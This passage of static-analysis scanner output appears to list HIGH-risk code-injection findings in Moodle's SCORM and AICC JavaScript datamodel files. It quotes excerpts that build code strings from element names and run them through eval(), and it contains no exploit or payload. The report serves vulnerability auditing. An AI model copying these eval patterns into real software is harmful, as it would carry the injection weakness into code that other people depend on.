"vulnerabilities": [{"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " eval(subelement + ' = new Object();');\n if (subelement.substr(0,14) == 'cmi.objectives') {\n eval(subelement + '.score = new Object();');\n eval(subelement + '.score._children = score_children;');\n eval(subelement + '.score.raw = \"\";');\n eval(subelement + '.score.min = \"\";');\n eval(subelement + '.score.max = \"\";');\n }\n if (subelement.substr(0,16) == 'cmi.interactions') {\n eval(subelement + '.objectives = new Object();');\n eval(subelement + '.objectives._count = 0;');\n", "vulnerId": "APPCUT:62:14236", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 324, "positionInEndLine": 81, "startLineNumber": 324, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n elementstring = '&' + underscore(element) + '=' + escape(data[property]);\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue') != data[property]) {\n datastring += elementstring;\n }\n } else {\n datastring += elementstring;\n }\n", "vulnerId": "APPCUT:62:14227", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 36, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 497, "positionInEndLine": 104, "startLineNumber": 497, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " }\n return \"true\";\n }\n }\n } else {\n errorCode = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].writeerror');\n }\n } else {\n errorCode = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].writeerror');\n }\n } else {\n", "vulnerId": "APPCUT:62:14235", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 44, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 387, "positionInEndLine": 109, "startLineNumber": 387, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " for (i = 1; i < elementIndexes.length - 1; i++) {\n elementIndex = elementIndexes[i];\n if (elementIndexes[i + 1].match(/^\\d+$/)) {\n if ((typeof eval(subelement + '.' + elementIndex)) == \"undefined\") {\n eval(subelement + '.' + elementIndex + ' = new Object();');\n eval(subelement + '.' + elementIndex + '._count = 0;');\n }\n if (elementIndexes[i + 1] == eval(subelement + '.' + elementIndex + '._count')) {\n eval(subelement + '.' + elementIndex + '._count++;');\n }\n if (elementIndexes[i + 1] > eval(subelement + '.' + elementIndex + '._count')) {\n", "vulnerId": "APPCUT:62:14231", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 322, "positionInEndLine": 98, "startLineNumber": 322, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " elementIndexes = element.split('.');\n subelement = 'cmi';\n for (i = 1; i < elementIndexes.length - 1; i++) {\n elementIndex = elementIndexes[i];\n if (elementIndexes[i + 1].match(/^\\d+$/)) {\n if ((typeof eval(subelement + '.' + elementIndex)) == \"undefined\") {\n eval(subelement + '.' + elementIndex + ' = new Object();');\n eval(subelement + '.' + elementIndex + '._count = 0;');\n }\n if (elementIndexes[i + 1] == eval(subelement + '.' + elementIndex + '._count')) {\n eval(subelement + '.' + elementIndex + '._count++;');\n", "vulnerId": "APPCUT:62:14239", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 56, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 320, "positionInEndLine": 89, "startLineNumber": 320, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " i++;\n } else {\n subelement = subelement.concat('.' + elementIndex);\n }\n if ((typeof eval(subelement)) == \"undefined\") {\n eval(subelement + ' = new Object();');\n if (subelement.substr(0,14) == 'cmi.objectives') {\n eval(subelement + '.score = new Object();');\n eval(subelement + '.score._children = score_children;');\n eval(subelement + '.score.raw = \"\";');\n eval(subelement + '.score.min = \"\";');\n", "vulnerId": "APPCUT:62:14232", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 44, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 336, "positionInEndLine": 77, "startLineNumber": 336, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " eval(subelement + '.' + elementIndex + '._count = 0;');\n }\n if (elementIndexes[i + 1] == eval(subelement + '.' + elementIndex + '._count')) {\n eval(subelement + '.' + elementIndex + '._count++;');\n }\n if (elementIndexes[i + 1] > eval(subelement + '.' + elementIndex + '._count')) {\n errorCode = \"201\";\n }\n subelement = subelement.concat('.' + elementIndex + '_' + elementIndexes[i + 1]);\n i++;\n } else {\n", "vulnerId": "APPCUT:62:14230", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 72, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 327, "positionInEndLine": 117, "startLineNumber": 327, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": "\n // append the URI fragment to the string we plan to commit\n datastring += elementstring;\n\n // update the element default to reflect the current committed value\n eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue=data[property];');\n }\n } else {\n // append the URI fragment to the string we plan to commit\n datastring += elementstring;\n // no default value for the element, so set it now\n", "vulnerId": "APPCUT:62:14233", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 40, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 587, "positionInEndLine": 118, "startLineNumber": 587, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " }\n } else {\n errorCode = '407';\n }\n } else {\n eval(element + '=value;');\n errorCode = \"0\";\n if (scormdebugging) {\n LogAPICall(\"SetValue\", element, value, errorCode);\n }\n return \"true\";\n", "vulnerId": "APPCUT:62:14237", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 40, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 771, "positionInEndLine": 61, "startLineNumber": 771, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " if ((typeof eval(subelement)) == \"undefined\") {\n eval(subelement + ' = new Object();');\n if (subelement.substr(0,14) == 'cmi.objectives') {\n eval(subelement + '.score = new Object();');\n eval(subelement + '.score._children = score_children;');\n eval(subelement + '.score.raw = \"\";');\n eval(subelement + '.score.min = \"\";');\n eval(subelement + '.score.max = \"\";');\n }\n if (subelement.substr(0,16) == 'cmi.interactions') {\n eval(subelement + '.objectives = new Object();');\n", "vulnerId": "APPCUT:62:14228", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 323, "positionInEndLine": 81, "startLineNumber": 323, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " break;\n default:\n if ((parentelement != 'cmi.objectives') && (parentelement != 'cmi.interactions') && (typeof eval(parentelement) != \"undefined\")) {\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n eval(parentelement + '._count++;');\n eval(subelement + ' = new Object();');\n } else {\n errorCode = \"351\";\n diagnostic = \"Data Model Element Collection Set Out Of Order\";\n }\n } else {\n", "vulnerId": "APPCUT:62:14240", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 60, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 628, "positionInEndLine": 93, "startLineNumber": 628, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " errorCode = \"0\";\n if (Initialized) {\n if (element != \"\") {\n expression = new RegExp(CMIIndex,'g');\n elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'w') {\n element = String(element).replace(expression, \"_$1.\");\n elementIndexes = element.split('.');\n subelement = 'cmi';\n i = 1;\n", "vulnerId": "APPCUT:62:14226", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 32, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 247, "positionInEndLine": 86, "startLineNumber": 247, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " } else {\n errorCode = \"408\";\n }\n break;\n default:\n if ((parentelement != 'cmi.objectives') && (parentelement != 'cmi.interactions') && (typeof eval(parentelement) != \"undefined\")) {\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n eval(parentelement + '._count++;');\n eval(subelement + ' = new Object();');\n } else {\n errorCode = \"351\";\n", "vulnerId": "APPCUT:62:14234", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 144, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 625, "positionInEndLine": 160, "startLineNumber": 625, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " subelement += '.' + elementIndexes[i++];\n }\n\n if (subelement == element) {\n\n if ((typeof eval(subelement) != \"undefined\") && (eval(subelement) != null)) {\n errorCode = \"0\";\n if (scormdebugging) {\n LogAPICall(\"GetValue\", element, eval(element), 0);\n }\n return eval(element);\n", "vulnerId": "APPCUT:62:14238", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 44, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 398, "positionInEndLine": 57, "startLineNumber": 398, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/yuilib/3.17.2/json-parse-shim/json-parse-shim-min.js", "code": "Copyright 2014 Yahoo! Inc. All rights reserved.\nLicensed under the BSD License.\nhttp://yuilibrary.com/license/\n*/\n\nYUI.add(\"json-parse-shim\",function(Y,NAME){var _UNICODE_EXCEPTIONS=/[\\u0000\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g,_ESCAPES=/\\\\(?:[\"\\\\\\/bfnrt]|u[0-9a-fA-F]{4})/g,_VALUES=/\"[^\"\\\\\\n\\r]*\"|true|false|null|-?\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d+)?/g,_BRACKETS=/(?:^|:|,)(?:\\s*\\[)+/g,_UNSAFE=/[^\\],:{}\\s]/,_escapeException=function(e){return\"\\\\u\"+(\"0000\"+(+e.charCodeAt(0)).toString(16)).slice(-4)},_revive=function(e,t){var n=function(e,r){var i,s,o=e[r];if(o&&typeof o==\"object\")for(i in o)o.hasOwnProperty(i)&&(s=n(o,i),s===undefined?delete o[i]:o[i]=s);return t.call(e,r,o)};return typeof t==\"function\"?n({\"\":e},\"\"):e};Y.JSON.parse=function(s,reviver){typeof s!=\"string\"&&(s+=\"\"),s=s.replace(_UNICODE_EXCEPTIONS,_escapeException);if(!_UNSAFE.test(s.replace(_ESCAPES,\"@\").replace(_VALUES,\"]\").replace(_BRACKETS,\"\")))return _revive(eval(\"(\"+s+\")\"),reviver);throw new SyntaxError(\"JSON.parse\")},Y.JSON.parse.isShim=!0},\"3.17.2\",{requires:[\"json-parse\"]});\n", "vulnerId": "APPCUT:62:14229", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 883, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 8, "positionInEndLine": 894, "startLineNumber": 8, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}]}, {"pageNumber": 3, "vulnerabilities": [{"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " }\n datastring += TotalTime();\n }\n datastring += CollectData(data,'cmi');\n var element = 'adl.nav.request';\n var navrequest = eval(element) != datamodel[scoid][element].defaultvalue ? '&' + underscore(element) + '=' + encodeURIComponent(eval(element)) : '';\n datastring += navrequest;\n\n var myRequest = NewHttpReq();\n result = DoRequest(myRequest, datamodelurl, datamodelurlparams + datastring);\n\n", "vulnerId": "APPCUT:62:14272", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 29, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 1225, "positionInEndLine": 39, "startLineNumber": 1225, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " } else {\n errorCode = \"401\";\n }\n } else if (elementmodel.substr(elementmodel.length - countstr.length,elementmodel.length) == countstr) {\n parentmodel = elementmodel.substr(0,elementmodel.length - countstr.length);\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + parentmodel + '\"]')) != \"undefined\") {\n errorCode = \"301\";\n diagnostic = \"Data Model Element Cannot Have Count\";\n } else {\n errorCode = \"401\";\n }\n", "vulnerId": "APPCUT:62:14257", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 40, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 428, "positionInEndLine": 93, "startLineNumber": 428, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " var interactiontype = eval(subel1 + '.type');\n var interactioncount = eval(parentelement + '._count');\n // trap duplicate values, which is not allowed for type choice\n if (interactiontype == 'choice') {\n for (var i = 0; (i < interactioncount) && (errorCode == \"0\"); i++) {\n if (eval(parentelement + '.N' + i + '.pattern') == value) {\n errorCode = \"351\";\n }\n }\n }\n var nodes = new Array();\n", "vulnerId": "APPCUT:62:14259", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 67, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 722, "positionInEndLine": 107, "startLineNumber": 722, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " } else {\n element = parent + '.' + property;\n expression = new RegExp(CMIIndex,'g');\n elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n elementstring = '&' + underscore(element) + '=' + escape(data[property]);\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue') != data[property]) {\n datastring += elementstring;\n }\n", "vulnerId": "APPCUT:62:14268", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 28, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 494, "positionInEndLine": 87, "startLineNumber": 494, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " if (element != \"cmi.core.session_time\") {\n\n // check if this specific element is not defined in the datamodel,\n // but the generic element name is\n if ((eval('typeof datamodel[\"' + scoid + '\"][\"' + element + '\"]')) == \"undefined\"\n && (eval('typeof datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n\n // add this specific element to the data model (by cloning\n // the generic element) so we can track changes to it\n eval('datamodel[\"' + scoid + '\"][\"' + element + '\"]=CloneObj(datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]);');\n }\n", "vulnerId": "APPCUT:62:14264", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 32, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 561, "positionInEndLine": 93, "startLineNumber": 561, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " if (Initialized) {\n if (element != \"\") {\n expression = new RegExp(CMIIndex,'g');\n elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n expression = new RegExp(eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].format'));\n value = value + '';\n matches = value.match(expression);\n if (matches != null) {\n //Create dynamic data model element\n", "vulnerId": "APPCUT:62:14269", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 28, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 308, "positionInEndLine": 87, "startLineNumber": 308, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " for (element in datamodel[scoid]) {\n if (element.match(/\\.n\\./) == null) {\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue')) != 'undefined') {\n eval(element + ' = datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue;');\n } else {\n eval(element + ' = \"\";');\n }\n }\n }\n\n eval(cmiobj[scoid]);\n", "vulnerId": "APPCUT:62:14262", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 24, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 161, "positionInEndLine": 44, "startLineNumber": 161, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " errorCode = \"408\";\n }\n break;\n default:\n if ((parentelement != 'cmi.objectives') && (parentelement != 'cmi.interactions') && (typeof eval(parentelement) != \"undefined\")) {\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n eval(parentelement + '._count++;');\n eval(subelement + ' = new Object();');\n } else {\n errorCode = \"351\";\n diagnostic = \"Data Model Element Collection Set Out Of Order\";\n", "vulnerId": "APPCUT:62:14260", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 105, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 626, "positionInEndLine": 132, "startLineNumber": 626, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " if (element != \"\") {\n expression = new RegExp(CMIIndex,'g');\n elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n expression = new RegExp(eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].format'));\n value = value + '';\n matches = value.match(expression);\n if (matches != null) {\n //Create dynamic data model element\n if (element != elementmodel) {\n", "vulnerId": "APPCUT:62:14271", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 52, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 309, "positionInEndLine": 113, "startLineNumber": 309, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " }\n } else {\n if (element == 'cmi.comments') {\n cmi.comments = cmi.comments + value;\n } else {\n eval(element + '=value;');\n }\n errorCode = \"0\";\n if (scormdebugging) {\n LogAPICall(\"LMSSetValue\", element, value, errorCode);\n }\n", "vulnerId": "APPCUT:62:14273", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 44, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 377, "positionInEndLine": 65, "startLineNumber": 377, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": "\n if ((typeof eval(subelement)) == \"undefined\") {\n switch (elementmodel) {\n case 'cmi.objectives.n.id':\n if (!duplicatedID(element,parentelement,value)) {\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n eval(parentelement + '._count++;');\n eval(subelement + ' = new Object();');\n var subobject = eval(subelement);\n subobject.success_status = datamodel[scoid][\"cmi.objectives.n.success_status\"].defaultvalue;\n subobject.completion_status = datamodel[scoid][\"cmi.objectives.n.completion_status\"].defaultvalue;\n", "vulnerId": "APPCUT:62:14270", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 105, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 531, "positionInEndLine": 132, "startLineNumber": 531, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " eval(subelement + '.score.max = \"\";');\n }\n if (subelement.substr(0,16) == 'cmi.interactions') {\n eval(subelement + '.objectives = new Object();');\n eval(subelement + '.objectives._count = 0;');\n eval(subelement + '.correct_responses = new Object();');\n eval(subelement + '.correct_responses._count = 0;');\n }\n }\n }\n element = subelement.concat('.' + elementIndexes[elementIndexes.length - 1]);\n", "vulnerId": "APPCUT:62:14265", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 347, "positionInEndLine": 99, "startLineNumber": 347, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " for (element in datamodel[scoid]) {\n if (element.match(/\\.n\\./) == null) {\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue')) != 'undefined') {\n eval(element + ' = datamodel[\"' + scoid + '\"][\"' + element + '\"].defaultvalue;');\n } else {\n eval(element + ' = \"\";');\n }\n }\n }\n\n eval(cmiobj[scoid]);\n", "vulnerId": "APPCUT:62:14258", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 24, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 153, 